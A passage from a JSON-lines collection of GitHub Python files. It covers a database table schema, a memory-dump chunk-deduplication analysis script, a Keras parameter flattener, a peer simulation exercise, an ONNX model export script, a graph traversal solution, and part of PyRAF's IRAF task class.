postgresql.BIGINT),\n Column(\"bucket_name\", postgresql.VARCHAR(100)),\n Column(\"event_name\", postgresql.VARCHAR(100)),\n Column(\"event_ts\", postgresql.TIMESTAMP),\n Column(\"file_hash\", postgresql.VARCHAR(100)),\n Column(\"create_by\", postgresql.VARCHAR(20)),\n Column(\"create_ts\", postgresql.TIMESTAMP),\n)\n\nfile_process_step_log = Table(\n \"file_process_step_log\",\n metadata,\n Column(\"step_id\", postgresql.BIGINT, Sequence(\"step_seq\"), primary_key=True),\n Column(\"file_process_id\", postgresql.VARCHAR(100)),\n Column(\"step_name\", postgresql.VARCHAR(100)),\n Column(\"step_status\", postgresql.VARCHAR(50)),\n Column(\"step_status_detail\", postgresql.TEXT),\n Column(\"step_start_ts\", postgresql.TIMESTAMP),\n Column(\"step_end_ts\", postgresql.TIMESTAMP),\n Column(\"create_by\", postgresql.VARCHAR(20)),\n Column(\"create_ts\", postgresql.TIMESTAMP),\n)\n\ndatabase = Database(DATABASE_URL)\n","repo_name":"krishnanaredla/fr-ms","sub_path":"app/api/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19511332421","text":"\"\"\"Takes in the paths of two directories and reads all dump files. Computes md5 hashes of the dumped pages and performs analysis\"\"\"\nimport os\nimport sys\nimport hashlib\n\n\ndef compute_hash(chunk):\n hash_obj = hashlib.sha1(chunk)\n hash = hash_obj.hexdigest()\n return hash\n\n\ndef get_statistics_subpage(hash_table):\n # print('Total hashes in hash table: ' + str(len(hash_table)))\n count = 0\n for key in hash_table:\n num_chunks = len(hash_table[key])\n count += num_chunks\n\n # print('Total chunks: ' + str(count))\n return count\n\n\ndef get_common_chunks(table1, total1, table2, total2):\n common_hashes = list(set(table1.keys()) & set(table2.keys()))\n # print('Total Common Hashes: ' + str(len(common_hashes)))\n\n # print('Breakdown:')\n tuples_count = {}\n count1 = 0\n count2 = 0\n common_pages1 = []\n common_pages2 = []\n for key in common_hashes:\n num_chunks1 = len(table1[key])\n num_chunks2 = len(table2[key])\n count1 += num_chunks1\n count2 += num_chunks2\n # if (num_chunks1 > 100 and num_chunks2 > 100):\n # print(key, num_chunks1, num_chunks2)\n common_pages1.extend(table1[key])\n common_pages2.extend(table2[key])\n number_tuple = '(' + str(num_chunks1) + ' ' + str(num_chunks2) + ')'\n if number_tuple in tuples_count:\n tuples_count[number_tuple] += 1\n else:\n tuples_count[number_tuple] = 1\n\n # print('Chunks in Table 1 that are common: ' + str(count1) + ', ' +\n # str(float(count1) / total1))\n # print('Chunks in Table 2 that are common: ' + str(count2) + ', ' +\n # str(float(count2) / total2))\n percent1 = float(count1) / total1\n percent2 = float(count2) / total2\n return percent1, percent2\n\n\ndef read_dumps(dir, num_hashes, chunk_size):\n table = {}\n page_id = 0\n\n for subdir, _, files in os.walk(dir):\n for file in files:\n zero_fp = 0\n if file[:5] == \"pages\":\n filename = os.path.join(subdir, file)\n num_pages = 0\n\n # Read the binary file\n fo = open(filename, \"rb\")\n mem = fo.read()\n if mem:\n chunks_found = 0\n for i in range(len(mem) - chunk_size + 1):\n start = i\n end = i + chunk_size\n chunk = mem[start:end]\n\n # Compute hash\n hash = compute_hash(chunk)\n # Insert into table\n # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n chunks_found += 1\n if hash in table:\n table[hash].append(page_id)\n else:\n table[hash] = [page_id]\n\n if chunks_found == num_hashes:\n break\n\n return table\n\n\ndef read_dumps_rabin(dir, num_hashes, chunk_size):\n table = {}\n period = 2 * chunk_size\n\n for subdir, _, files in os.walk(dir):\n for file in files:\n if file[:5] == \"pages\":\n filename = os.path.join(subdir, file)\n num_pages = 0\n\n # Read the binary file\n fo = open(filename, \"rb\")\n mem = fo.read()\n if mem:\n chunks_found = 0\n start = 0\n while start < len(mem) - period + 1:\n chunk = mem[start:start + chunk_size]\n match_chunk = mem[start:start + period]\n\n # Compute hash\n hash = compute_hash(chunk)\n # Insert into table\n # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n chunks_found += 1\n if hash in table:\n flag = False\n for matching_chunk in table[hash]:\n if matching_chunk == match_chunk:\n flag = True\n break\n if not flag:\n table[hash].append(match_chunk)\n else:\n table[hash] = [match_chunk]\n\n if chunks_found == num_hashes:\n break\n\n start += period\n\n return table\n\n\ndef get_redundancy_rabin(dir, chunk_size, ref_table):\n period = 2 * chunk_size\n for subdir, _, files in os.walk(dir):\n for file in files:\n duplicate_bytes = 0\n total_bytes = 0\n if file[:5] == \"pages\":\n filename = os.path.join(subdir, file)\n\n # Read the binary file\n fo = open(filename, \"rb\")\n mem = fo.read()\n if mem:\n total_bytes += len(mem)\n start = 0\n while start < len(mem) - period + 1:\n chunk = mem[start:start + chunk_size]\n match_chunk = mem[start:start + period]\n\n # Compute hash\n hash = compute_hash(chunk)\n # Insert into table\n # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n if hash in ref_table:\n max_length = 0\n for matching_chunk in ref_table[hash]:\n match_length = 0\n if matching_chunk[:chunk_size] == chunk:\n # Check the remaining bytes\n match_length = chunk_size\n for i in range(period - chunk_size):\n if matching_chunk[chunk_size +\n i] == match_chunk[\n chunk_size + i]:\n match_length += 1\n else:\n break\n if match_length > max_length:\n max_length = match_length\n duplicate_bytes += max_length\n\n start += period\n\n return float(duplicate_bytes) / total_bytes\n\n\ndef calc(name1, name2, chunk_size):\n table1 = read_dumps(name1, 5000000, chunk_size)\n table2 = read_dumps(name2, 5000000, chunk_size)\n\n count1 = get_statistics_subpage(table1)\n count2 = get_statistics_subpage(table2)\n p1, p2 = get_common_chunks(table1, count1, table2, count2)\n print(p1, p2)\n return p1, p2\n\n\ndef calc_rabin(name1, name2, chunk_size):\n table2 = read_dumps_rabin(name2, 5000000, chunk_size)\n p1 = get_redundancy_rabin(name1, chunk_size, table2)\n\n table1 = read_dumps_rabin(name1, 5000000, chunk_size)\n p2 = get_redundancy_rabin(name2, chunk_size, table1)\n\n print(p1, p2)\n return p1, p2\n","repo_name":"utnslab/Medes","sub_path":"motivation/calc_dedup.py","file_name":"calc_dedup.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"33072736162","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 14 01:32:48 2018\n\n@author: thinkpad\n\"\"\"\n\nimport keras.backend as K\nimport numpy as np\n\n\nclass Flattener(object):\n \n def __init__(self, variables):\n self.variables = variables \n assert type(variables) == list\n self.shapes = list(map(K.int_shape, variables))\n self.get_op = K.concatenate([K.flatten(x) for x in self.variables])\n start = 0\n self.idx = []\n for s in self.shapes:\n size = np.prod(s)\n self.idx.append((start,start + size))\n start += size\n self.total_size = start\n \n def get_value(self):\n return K.get_value(self.get_op)\n\n def set_value(self,theta):\n assert theta.shape == (self.total_size,)\n theta = np.array(theta,dtype='float32')\n \n for i,v in enumerate(self.variables):\n \n K.set_value(v, np.reshape(\n theta[self.idx[i][0]:self.idx[i][1]], self.shapes[i]))\n def get(self):\n return self.get_op \n\n def flatgrad(self,loss):\n grads = K.gradients(loss, self.variables)\n return K.concatenate([K.flatten(g) for g in grads])\n \n","repo_name":"aghriss/DeepRL","sub_path":"base/flattener.py","file_name":"flattener.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7913063949","text":"from peer import Peer\nfrom simulation import Simulation, BINS\nfrom histogram import compute_histogram_bins, plot_histogram\n\nclass PeerQ2(Peer):\n\n def send_data_to_backend(self):\n \"\"\"\n Question 2:\n This method should return an _array_ of the peer's\n connection durations.\n \"\"\"\n return self.peer_pool.values()\n\n\nclass SimulationQ2(Simulation):\n\n def generate_network(self):\n self.network = [PeerQ2() for _ in range(self.number_of_peers)]\n\n def process_backend_data(self):\n \"\"\"\n Question 2:\n This method should do all necessary processing to return\n the connection durations histogram bins counts.\n Don't call `plot_histogram` in this method, we just want\n to compute the histogram bins counts!\n \"\"\"\n durations = [duration for peer in self.network for duration in peer.send_data_to_backend()]\n return compute_histogram_bins(durations, BINS)\n\n\nif __name__ == \"__main__\":\n\n s = SimulationQ2(number_of_peers=10, max_peer_pool_size=2)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=10)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=100)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=1000)\n s.run()\n s.report_result()\n\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=10)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=100)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=1000)\n s.run()\n s.report_result()\n","repo_name":"yihohu/sr_exercice","sub_path":"question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71835787662","text":"import os\nfrom pathlib import Path\nimport sys\nimport torch\nimport torch.onnx\nimport onnx\nfrom transformers import BertTokenizer\nimport yaml\n\nsys.path.append(str(Path(__file__).parent.parent.absolute()))\nfrom model import MultiClassLabelModel\n\n\nclass DS2Onnx():\n def __init__(self, input_model, output_model, device_id=0, config_file='configs/train.yaml') -> None:\n with open(config_file, 'r') as f:\n self.cfg = yaml.load(f, Loader=yaml.FullLoader)\n \n self.input_model = input_model\n self.output_model = output_model\n self.device = torch.device(f\"cuda:{device_id}\" if torch.cuda.is_available() else \"cpu\")\n \n def load_model(self, ):\n self.model = MultiClassLabelModel(base_model_path=self.cfg[\"base_model_path\"], label_num=self.cfg[\"label_num\"])\n \n self.model.load_state_dict(torch.load(self.input_model, map_location=self.device), strict=True)\n \n self.model.to(self.device)\n self.model.eval()\n \n def dataset(self, ):\n tokenizer = BertTokenizer.from_pretrained(self.cfg[\"base_token_path\"])\n \n sample_text = \"北京币石景山区石景山学校\"\n \n inputs = tokenizer(sample_text, add_special_tokens=True, padding='max_length', truncation=True, max_length=self.cfg[\"max_len\"], return_tensors='pt')\n \n dummy_input = tuple(value.to(self.device) for value in inputs.values())\n \n input_name_list = list(inputs.keys())\n print(\"input_name_list: \", input_name_list)\n \n return dummy_input, input_name_list\n \n def check_onnx(self, ):\n onnx_model = onnx.load(self.output_model)\n try:\n onnx.checker.check_model(onnx_model)\n print(\"onnx model check ok!\")\n except onnx.checker.ValidationError as e:\n print(f\"model is invalid: {e}\")\n \n def __call__(self, ):\n dir_name = os.path.dirname(self.output_model)\n if dir_name and not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n self.load_model()\n \n dummy_input, input_name_list = self.dataset()\n\n output_name_list = [\"labels\"]\n \n torch.onnx.export(self.model,\n dummy_input,\n self.output_model,\n export_params=True,\n opset_version=self.cfg[\"onnx_version\"],\n do_constant_folding=True,\n input_names=input_name_list,\n output_names=output_name_list,\n dynamic_axes={input_name: {0: \"batch\", 1: \"seq\"} for input_name in input_name_list},\n verbose=False)\n print('模型已转为ONNX==>', self.output_model)\n self.check_onnx()\n\n\nif __name__ == \"__main__\":\n input_model = \"xxx.pt\"\n output_model = \"api_model/onnx/2/best_model.onnx\"\n ds2onnx = DS2Onnx(input_model, output_model)\n ds2onnx()\n","repo_name":"awesome-yyh/yyh-util","sub_path":"deepLearning/inference/onnx/ds2onnx.py","file_name":"ds2onnx.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"32249558424","text":"# 백준 9372번 상근이의 여행\n# SILVER 4\n# 알고리즘 분류 : 그래프 이론, 트리\n# DFS로 순회하는 횟수를 세서 출력\n# 모든 그래프가 연결되어 있기 때문에 N-1을 출력해도 된다\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\nT = int(input())\ndef dfs(v) :\n global cnt\n cnt += 1\n check[v] = 1\n for i in g[v] :\n if not check[i] :\n dfs(i)\nfor _ in range(T) :\n cnt = 0\n N,M = map(int,input().split())\n g = [[] for _ in range(N+1)]\n check = [0]*(N+1)\n for i in range(M) :\n a,b = map(int,input().split())\n g[a].append(b)\n g[b].append(a)\n dfs(1)\n print(cnt-1)","repo_name":"optshj/Baekjoon-Python","sub_path":"SILVER/9372.py","file_name":"9372.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19003062236","text":"\"\"\"module iraftask.py -- defines IrafTask and IrafPkg classes\n\nR. White, 2000 June 26\n\niraftask defines the original PyRAF task functionality which pre-dates\nthe creation of IRAF ECL. irafecl is closely related and derived from\niraftask, providing drop-in replacements for the Task classes defined\nhere which also support ECL syntax like \"iferr\" and $errno.\n\"\"\"\n\n\nimport fnmatch\nimport os\nimport sys\nimport copy\nimport re\nfrom .tools import basicpar, irafglobals\nfrom .tools.irafglobals import IrafError, Verbose\nfrom . import subproc\nfrom . import irafinst\nfrom . import irafpar\nfrom . import irafexecute\nfrom . import cl2py\nfrom . import iraf\nfrom .tools import minmatch, irafutils, taskpars\n\n# may be set to function to monitor task execution\n# function gets called for every task execution\nexecutionMonitor = None\n\n# -----------------------------------------------------\n# IRAF task class\n# -----------------------------------------------------\n\n# basic IrafTask attributes\n_IrafTask_attr_dict = {\n '_name': None,\n '_pkgname': None,\n '_pkgbinary': None,\n '_hidden': 0,\n '_hasparfile': 1,\n '_tbflag': 0,\n # full path names and parameter list get filled in on demand\n '_fullpath': None,\n # parameters have a current set of values and a default set\n '_currentParList': None,\n '_defaultParList': None,\n '_runningParList': None,\n '_currentParpath': None,\n '_defaultParpath': None,\n '_scrunchParpath': None,\n '_parDictList': None,\n '_foreign': 0,\n}\n\n# This is a list of all the IrafTask objects that have been created.\n# There are variables in iraffunctions that superficially\n# resemble this, but none of them contain the complete list, so I\n# keep it here. This is currently used only for the \"taskinfo\"\n# operation.\n#\n# We generally approach this list interactively and with a wildcards.\n# I don't see any particularly useful indexing, so it is just a plain\n# linear search.\n#\nall_task_definitions = []\n\n# use empty \"tag\" class from irafglobals as base class\n\n\nclass IrafTask(irafglobals.IrafTask, taskpars.TaskPars):\n \"\"\"IRAF task class\"\"\"\n\n # We remember parameters to the __init__ function\n #\n # prefix\n # ? - see obj._saved_prefix\n #\n # name\n # the name of the task. We don't actually save this, but\n # obj._name contains the name as we may have modified it.\n #\n # suffix\n # ? - see obj._saved_suffix\n #\n # filename\n # ? - obviously more than just a file name. obj._filename\n # is the modified value\n #\n # pkgname\n # the name of the package that this task is in. see obj._pkgname\n #\n # pkgbinary\n # places that the binary may be. see obj._pkgbinary\n #\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n\n # for this heavily used code, pull out the dictionary and\n # initialize it directly to avoid calls to __setattr__\n #\n # b.t.w. do not try to set the attributes directly - it doesn't\n # work. (not sure if that is a bug or a \"feature\")\n objdict = self.__dict__\n\n # remember the task definition in case we want to see it later\n all_task_definitions.append(self)\n\n objdict['_saved_suffix'] = suffix\n objdict['_saved_prefix'] = prefix\n\n # stuff all the parameters into the object\n objdict.update(_IrafTask_attr_dict)\n sname = name.replace('.', '_')\n if sname != name:\n print(\"Warning: '.' illegal in task name, changing\", name, \"to\",\n sname)\n spkgname = pkgname.replace('.', '_')\n if spkgname != pkgname:\n print(\"Warning: '.' illegal in pkgname, changing\", pkgname, \"to\",\n spkgname)\n objdict['_name'] = sname\n objdict['_pkgname'] = spkgname\n objdict['_pkgbinary'] = []\n self.addPkgbinary(pkgbinary)\n # tasks with names starting with '_' are implicitly hidden\n if name[0:1] == '_':\n objdict['_hidden'] = 1\n if prefix == '$':\n objdict['_hasparfile'] = 0\n if suffix == '.tb':\n objdict['_tbflag'] = 1\n if filename and filename[0] == '$':\n # this is a foreign task\n objdict['_foreign'] = 1\n objdict['_filename'] = filename[1:]\n # handle weird syntax for names\n if self._filename == 'foreign':\n objdict['_filename'] = name\n elif self._filename[:8] == 'foreign ':\n objdict['_filename'] = name + self._filename[7:]\n elif filename[:2] == '$0':\n objdict['_filename'] = name + filename[2:]\n else:\n objdict['_filename'] = filename\n\n def initTask(self, force=0):\n \"\"\"Fill in full pathnames of files and read parameter file(s)\n\n Force indicates whether shortcut initialization can be used\n or not. (No difference for base IrafTask.)\n \"\"\"\n if self._filename and not self._fullpath:\n if irafinst.EXISTS:\n self._initFullpath() # allow to throw on error\n else: # be more accommodating\n try:\n self._initFullpath()\n except IrafError:\n self._initNoIrafTask()\n if self._currentParList is None:\n self._initParpath()\n self._initParList()\n\n def _initNoIrafTask(self):\n \"\"\" Special-case handle the initialization that is going awry due\n to a missing IRAF installation. \"\"\"\n # Handle non-IRAF installs - could not find the file anywhere\n # Handle .par files differently from other types\n orig = self._filename\n base = os.path.basename(self._filename)\n base = base[1 + base.rfind('$'):]\n self._filename = f'{irafinst.NO_IRAF_PFX}/{base}'\n if Verbose > 1:\n print('Task \"' + self._name + '\" needed \"' + orig + '\" got: ' +\n self._filename)\n\n # =========================================================\n # public accessor methods for attributes\n # =========================================================\n\n # ---------------------------------------------------------\n # first set returns current values (which may be None if\n # initTask has not been executed yet)\n # ---------------------------------------------------------\n\n def getName(self):\n return self._name\n\n def getPkgname(self):\n return self._pkgname\n\n def getPkgbinary(self):\n return self._pkgbinary\n\n def isHidden(self):\n return self._hidden\n\n def hasParfile(self):\n return self._hasparfile\n\n def getTbflag(self):\n return self._tbflag\n\n def getForeign(self):\n return self._foreign\n\n def getFilename(self):\n return self._filename\n\n # ---------------------------------------------------------\n # second set initializes task variables (which were deferred to\n # speed up initial instance creation)\n # ---------------------------------------------------------\n\n def getFullpath(self):\n \"\"\"Return full path name of executable\"\"\"\n self.initTask()\n return self._fullpath\n\n def getParpath(self):\n \"\"\"Return full path name of parameter file\"\"\"\n self.initTask()\n return self._currentParpath\n\n def getParList(self, docopy=0):\n \"\"\"Return list of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n return plist.getParList(docopy=docopy)\n else:\n return []\n\n def getDefaultParList(self):\n \"\"\"Return default list of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._defaultParList\n if plist:\n return plist.getParList()\n else:\n return []\n\n def getParDict(self):\n \"\"\"Return (min-match) dictionary of all parameter objects\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n return plist.getParDict()\n else:\n return minmatch.MinMatchDict()\n\n def getParObject(self, paramname, exact=0, alldict=0):\n \"\"\"Get the IrafPar object for a parameter\n\n If exact is set, param name must match exactly.\n If alldict is set, look in all dictionaries (default is\n just this task's dictionaries.)\n \"\"\"\n self.initTask()\n\n # search the standard dictionaries for the parameter\n # most of the time it will be in the active task dictionary\n try:\n paramdict = self.getParDict()\n if paramdict._has(paramname, exact=exact):\n return paramdict[paramname]\n except minmatch.AmbiguousKeyError as e:\n # re-raise the error with a bit more info\n raise IrafError(f\"Cannot get parameter `{paramname}'\\n{str(e)}\")\n\n if alldict:\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n return paramdict[paramname]\n\n raise IrafError(\"Unknown parameter requested: \" + paramname)\n\n def getAllMatches(self, param):\n \"\"\"Return list of names of all parameters that may match param\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n return plist.getAllMatches(param)\n else:\n return []\n\n # ---------------------------------------------------------\n # modify and test attributes\n # ---------------------------------------------------------\n\n def addPkgbinary(self, pkgbinary):\n \"\"\"Add another entry in list of possible package binary locations\n\n Parameter can be a string or a list of strings\"\"\"\n\n if not pkgbinary:\n return\n elif isinstance(pkgbinary, str):\n if pkgbinary and (pkgbinary not in self._pkgbinary):\n self._pkgbinary.append(pkgbinary)\n else:\n for pbin in pkgbinary:\n if pbin and (pbin not in self._pkgbinary):\n self._pkgbinary.append(pbin)\n\n def setHidden(self, value=1):\n \"\"\"set hidden attribute, which can be specified in\n a separate 'hide' statement\n \"\"\"\n self._hidden = value\n\n def isConsistent(self, other):\n \"\"\"Returns true if this task is consistent with another task object\"\"\"\n return self.__class__ == other.__class__ and \\\n self.getFilename() == other.getFilename() and \\\n self.hasParfile() == other.hasParfile() and \\\n self.getForeign() == other.getForeign() and \\\n self.getTbflag() == other.getTbflag()\n\n # ---------------------------------------------------------\n # run the task\n # ---------------------------------------------------------\n\n def run(self, *args, **kw):\n \"\"\"Execute this task with the specified arguments\"\"\"\n\n self.initTask(force=1)\n\n # Special _save keyword turns on parameter-saving.\n # Default is *not* to save parameters (so it is necessary\n # to use _save=1 to get parameter changes to be persistent.)\n if '_save' in kw:\n save = kw['_save']\n del kw['_save']\n else:\n save = 0\n\n # Handle other special keywords\n specialKW = self._specialKW(kw)\n\n # Special Stdout, Stdin, Stderr keywords are used to redirect IO\n redirKW, closeFHList = iraf.redirProcess(kw)\n\n # Set parameters ...\n # The setParList call sets _runningParList, which is a copy that is\n # only intended to live for the lifetime of the running task. The\n # _currentParList version lives longer - it represents the on-disk\n # copy of the par list, during the life of this PyRAF session.\n kw['_setMode'] = 1\n self.setParList(*args, **kw)\n\n if Verbose > 1:\n print(f\"run {self._name} ({self.__class__.__name__}: \"\n f\"{self._fullpath})\", file=sys.stderr)\n if self._runningParList:\n self._runningParList.lParam()\n\n # delete list of param dictionaries so it will be\n # recreated in up-to-date version if needed\n self._parDictList = None\n # apply IO redirection\n resetList = self._applyRedir(redirKW)\n try:\n # Hook for execution monitor\n if executionMonitor:\n executionMonitor(self)\n self._run(redirKW, specialKW)\n self._updateParList(save)\n if Verbose > 1:\n print('Successful task termination', file=sys.stderr)\n finally:\n rv = self._resetRedir(resetList, closeFHList)\n self._deleteRunningParList()\n if self._parDictList:\n self._parDictList[0] = (self._name, self.getParDict())\n if executionMonitor:\n executionMonitor()\n return rv\n\n def getMode(self, parList=None):\n \"\"\"Returns mode string for this task\n\n Searches up the task, package, cl hierarchy for automatic modes\n \"\"\"\n if parList is not None:\n mode = parList.getValue('mode', prompt=0)\n else:\n pdict = self.getParDict()\n if pdict:\n mode = pdict['mode'].get(prompt=0)\n else:\n mode = \"a\"\n if mode[:1] != \"a\":\n return mode\n\n # cl is the court of last resort, don't look at its packages\n if self is iraf.cl:\n return \"h\"\n\n # package name is undefined only at very start of initialization\n # just use the standard default\n if not self._pkgname:\n return \"ql\"\n\n # up we go -- look in parent package\n pkg = iraf.getPkg(self._pkgname)\n # clpackage is at top and is its own parent\n if pkg is not self:\n return pkg.getMode()\n # didn't find it in the package hierarchy, so use cl mode\n mode = iraf.cl.mode\n # default is hidden if automatic all the way to top\n if mode[:1] == \"a\":\n return \"h\"\n else:\n return mode\n\n def setParList(self, *args, **kw):\n \"\"\"Set arguments to task in _runningParList copy of par list\n\n Creates a copy of the task parameter list and sets the\n parameters. It is up to subsequent code (in the run method)\n to propagate these changes to the persistent parameter list.\n\n Special arguments:\n _setMode=1 to set modes of automatic parameters\n ParList can be used to pass in an entire parameter list object\n \"\"\"\n self.initTask(force=1)\n\n if self._currentParList is None:\n return None\n\n # Special ParList parameter is used to pass in an entire\n # parameter list\n if 'ParList' in kw:\n parList = kw['ParList']\n del kw['ParList']\n if isinstance(parList, str):\n # must be a .par filename\n filename = parList\n parList = irafpar.IrafParList(self.getName(), filename)\n elif parList and not isinstance(parList, irafpar.IrafParList):\n raise TypeError(\"ParList parameter must be a filename or \"\n \"an IrafParList object\")\n else:\n parList = None\n\n if self._runningParList is not None:\n # only one runningParList at a time -- all tasks use it\n newParList = self._runningParList\n parList = None\n else:\n if parList:\n newParList = copy.deepcopy(parList)\n else:\n newParList = copy.deepcopy(self._currentParList)\n\n if '_setMode' in kw:\n _setMode = kw['_setMode']\n del kw['_setMode']\n else:\n _setMode = 0\n\n # create parlist copies for pset tasks too\n for p in newParList.getParList():\n if isinstance(p, irafpar.IrafParPset):\n p.get().setParList()\n\n # now, finally, set the passed-in parameters\n newParList.setParList(*args, **kw)\n if _setMode:\n # set mode of automatic parameters\n mode = self.getMode(newParList)\n for p in newParList.getParList():\n p.mode = p.mode.replace(\"a\", mode)\n if parList:\n # XXX Set all command-line flags for parameters when a\n # XXX parlist is supplied so that it does not prompt for\n # XXX missing parameters. Is this the preferred behavior?\n newParList.setAllFlags()\n\n self._runningParList = newParList\n\n # ---------------------------------------------------------\n # task parameter access\n # ---------------------------------------------------------\n\n def setParam(self,\n qualifiedName,\n newvalue,\n check=1,\n exact=0,\n scope='',\n idxHint=None):\n \"\"\"Set parameter specified by qualifiedName to newvalue.\n\n qualifiedName can be a simple parameter name or can be\n [[package.]task.]paramname[.field].\n If check is set to zero, does not check value to make sure it\n satisfies min-max range or choice list. scope, idxHint are ignored.\n \"\"\"\n\n package, task, paramname, pindex, field = _splitName(qualifiedName)\n\n # special syntax for package parameters\n if task == \"_\":\n task = self._pkgname\n\n if task or package:\n if not package:\n # maybe this task is the name of one of the dictionaries?\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if dictname == task:\n if paramname in paramdict:\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n else:\n raise IrafError(\n \"Attempt to set unknown parameter \" +\n qualifiedName + ' for task ' + task)\n # Not one of our dictionaries, so must find the relevant task\n if package:\n task = package + '.' + task\n try:\n tobj = iraf.getTask(task)\n # reattach the index and/or field\n if pindex:\n paramname = paramname + '[' + repr(pindex + 1) + ']'\n if field:\n paramname = paramname + '.' + field\n tobj.setParam(paramname, newvalue, check=check)\n return\n except KeyError:\n raise IrafError(\"Could not find task \" + task +\n \" to get parameter \" + qualifiedName)\n except IrafError as e:\n raise IrafError(\n str(e) + \"\\nFailed to set parameter \" + qualifiedName)\n\n # no task specified, just search the standard dictionaries\n # most of the time it will be in the active task dictionary\n\n paramdict = self.getParDict()\n if paramdict._has(paramname, exact=exact):\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n paramdict[paramname].set(newvalue,\n index=pindex,\n field=field,\n check=check)\n return\n else:\n raise IrafError(\"Attempt to set unknown lone parameter \" +\n qualifiedName)\n\n def getParam(self, qualifiedName, native=1, mode=None, exact=0, prompt=1):\n \"\"\"Return parameter specified by qualifiedName.\n\n qualifiedName can be a simple parameter name or can be\n [[package.]task.]paramname[.field].\n Paramname can also have an optional subscript, \"param[1]\".\n If native is non-zero (default), returns native format (e.g. float\n for floating point parameter.), otherwise returns string value.\n If exact is set, parameter name must match exactly. Default\n is to do minimum match.\n If prompt is 0, does not prompt for parameter value (even if\n parameter is undefined.)\n \"\"\"\n\n # DBG \"GP:\", str(self._name), qualifiedName, native, mode, exact, prompt\n package, task, paramname, pindex, field = _splitName(qualifiedName)\n\n if (not task) or (task == self._name):\n # no task specified, just search the standard dictionaries\n return self._getParValue(paramname,\n pindex,\n field,\n native,\n mode,\n exact=exact,\n prompt=prompt)\n\n # when task is specified, ignore exact flag -- always do minmatch\n\n # special syntax for package parameters\n if task == \"_\":\n task = self._pkgname\n\n if not package:\n # maybe this task is the name of one of the dictionaries?\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if dictname == task:\n if paramname in paramdict:\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n else:\n raise IrafError(\"Unknown parameter requested: \" +\n qualifiedName)\n\n # Not one of our dictionaries, so must find the relevant task\n if package:\n task = package + '.' + task\n try:\n tobj = iraf.getTask(task)\n return tobj._getParValue(paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n except KeyError:\n raise IrafError(\"Could not find task \" + task +\n \" to get parameter \" + qualifiedName)\n except IrafError as e:\n raise IrafError(\n str(e) + \"\\nFailed to get parameter \" + qualifiedName)\n\n def _getParValue(self,\n paramname,\n pindex,\n field,\n native,\n mode,\n exact=0,\n prompt=1):\n # search the standard dictionaries for the parameter\n # most of the time it will be in the active task dictionary\n paramdict = self.getParDict()\n try:\n if paramdict._has(paramname, exact=exact):\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=mode,\n prompt=prompt)\n except minmatch.AmbiguousKeyError as e:\n # re-raise the error with a bit more info\n raise IrafError(f\"Cannot get parameter `{paramname}'\\n{str(e)}\")\n\n # OK, the easy case didn't work -- now initialize the\n # complete parDictList (if necessary) and search them all\n if self._parDictList is None:\n self._setParDictList()\n for dictname, paramdict in self._parDictList:\n if paramdict._has(paramname, exact=exact):\n return self._getParFromDict(paramdict,\n paramname,\n pindex,\n field,\n native,\n mode=\"h\",\n prompt=prompt)\n else:\n raise IrafError(f'Unknown parameter requested: \"{paramname}\" '\n f'for task: \"{self._name}\" '\n f'in pkg: \"{self._pkgname}\"')\n\n # ---------------------------------------------------------\n # task parameter utility methods\n # ---------------------------------------------------------\n\n def lParam(self, verbose=0):\n \"\"\"List the task parameters\"\"\"\n self.initTask(force=1)\n plist = self._runningParList or self._currentParList\n if plist:\n plist.lParam(verbose=verbose)\n else:\n 